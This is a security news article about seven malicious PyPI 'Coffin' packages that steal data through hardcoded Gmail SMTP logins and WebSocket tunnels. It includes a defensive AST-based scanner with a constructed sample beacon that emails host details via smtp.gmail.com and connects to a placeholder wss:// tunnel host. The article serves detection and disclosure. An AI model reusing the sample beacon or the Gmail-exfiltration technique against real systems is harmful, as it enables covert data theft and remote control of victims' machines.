Malicious Python packages exploit Gmail and WebSockets

📟 News

Date: 06/05/2025

Socket’s Threat Research Team discovered seven malicious Python packages that use Gmail SMTP servers and WebSockets for data exfiltration and remote command execution.

Socket analysts reported their findings to the Python Package Index (PyPI), and the malicious packages were removed. However, some of them had been available on PyPI for more than four years, and one package was downloaded more than 18,000 times.

Malware was identified in the following packages:

  • Coffin-Codes-Pro (9000 downloads);
  • Coffin-Codes-NET2 (6200 downloads);
  • Coffin-Codes-NET (6100 downloads);
  • Coffin-Codes-2022 (18,100 downloads);
  • Coffin2022 (6500 downloads);
  • Coffin-Grave (6500 downloads); and
  • cfc-bsb (2900 downloads).

The malicious Coffin packages pose as the legitimate Coffin adapter that integrates Jinja2 templates into Django projects.

Their malicious functionality includes covert remote access and data exfiltration via Gmail.

The packages use hardcoded credentials to log into Gmail's SMTP server (smtp.gmail.com) and email information collected on the victim host to their operators, which gives the operators what they need to remotely access the compromised system. Because outbound mail to smtp.gmail.com is a trusted, TLS-encrypted channel that most organizations allow, firewalls and EDR systems are unlikely to flag such traffic as suspicious.

After emailing the stolen data, the malware opens a WebSocket connection over TLS to the attacker's server and receives instructions for setting up an encrypted, bidirectional tunnel between the host and the attacker.

Using its Client class, the malware relays traffic from the remote attacker into the local system, exposing internal admin panels and APIs and allowing the operator to transfer files, steal email, execute shell commands, harvest credentials, and move laterally.
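The combination described in the two paragraphs above (a hardcoded Gmail SMTP login used for exfiltration, followed by a WebSocket client for the tunnel) is cheap to look for statically before a package is installed. The scanner below is an added example, not Socket's tooling and not code from the Coffin packages; it walks a module's AST and flags each indicator separately, then combines them into a verdict. The sample source it is run on is constructed for the example and only mimics the indicators, and the addresses and URL in it are placeholders.

```python
"""Static triage of a Python source file for the exfiltration indicators
described in the article.  Added example; the SAMPLE below is constructed."""
import ast
import re
from dataclasses import dataclass
from typing import List, Set

GMAIL_SMTP_HOSTS = {"smtp.gmail.com"}
WEBSOCKET_MODULES = {"websocket", "websockets", "socketio"}
GMAIL_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@gmail\.com")


@dataclass
class Finding:
    kind: str      # indicator name
    lineno: int    # line in the scanned source
    detail: str    # the literal that triggered it


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as smtplib.SMTP_SSL as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _str_args(call: ast.Call) -> List[str]:
    """Positional string literals passed to a call (hardcoded values)."""
    return [a.value for a in call.args
            if isinstance(a, ast.Constant) and isinstance(a.value, str)]


class IndicatorScanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: List[Finding] = []

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            if alias.name.split(".")[0] in WEBSOCKET_MODULES:
                self.findings.append(Finding("websocket_import", node.lineno, alias.name))
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        module = node.module or ""
        if module.split(".")[0] in WEBSOCKET_MODULES:
            self.findings.append(Finding("websocket_import", node.lineno, module))
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted(node.func)
        strs = _str_args(node)
        # smtplib.SMTP("smtp.gmail.com", 587) or SMTP_SSL("smtp.gmail.com", 465)
        if name.endswith(("SMTP", "SMTP_SSL")) and any(s in GMAIL_SMTP_HOSTS for s in strs):
            self.findings.append(Finding("gmail_smtp", node.lineno, strs[0]))
        # conn.login("<gmail address>", "<password>") with BOTH arguments literal
        if name.endswith(".login") and len(strs) == 2 and GMAIL_ADDR.fullmatch(strs[0]):
            self.findings.append(Finding("hardcoded_gmail_login", node.lineno, strs[0]))
        self.generic_visit(node)

    def visit_Constant(self, node: ast.Constant) -> None:
        # A ws:// or wss:// endpoint literal is the tunnel side of the pattern.
        if isinstance(node.value, str) and node.value.startswith(("ws://", "wss://")):
            self.findings.append(Finding("websocket_url", node.lineno, node.value))


def scan_source(source: str) -> List[Finding]:
    scanner = IndicatorScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def triage(source: str) -> str:
    """'suspicious' when Gmail exfiltration AND a WebSocket client co-occur,
    'review' for any single indicator, 'clean' otherwise."""
    kinds: Set[str] = {f.kind for f in scan_source(source)}
    exfil = {"gmail_smtp", "hardcoded_gmail_login"} <= kinds
    tunnel = bool(kinds & {"websocket_import", "websocket_url"})
    if exfil and tunnel:
        return "suspicious"
    return "review" if kinds else "clean"


# Constructed sample mimicking the indicators; NOT the real package code.
SAMPLE = '''\
import os, platform, smtplib
import websocket
from email.mime.text import MIMEText

def beacon():
    body = f"{platform.node()} {os.getlogin()}"
    s = smtplib.SMTP("smtp.gmail.com", 587)
    s.starttls()
    s.login("example.operator@gmail.com", "placeholder-app-password")
    s.sendmail("example.operator@gmail.com", "example.operator@gmail.com",
               MIMEText(body).as_string())
    ws = websocket.create_connection("wss://example.invalid/tunnel")
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"{f.kind:<24} line {f.lineno}: {f.detail}")
    print("verdict:", triage(SAMPLE))
```

Run it over the extracted sdist or wheel contents (every `.py` file) before installation, or wire `triage` into a pre-install hook. The verdict is deliberately conservative: a single hit such as a Gmail SMTP host is common in legitimate notification code and only warrants review, while the co-occurrence of a literal Gmail login and a WebSocket client in one package is the specific pattern reported here.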

Based on the email addresses used (e.g. blockchain.bitcoins2020@gmail.com), Socket analysts conclude that the primary purpose of the malicious packages is to steal cryptocurrency, especially given that similar tactics were previously used to steal Solana private keys.
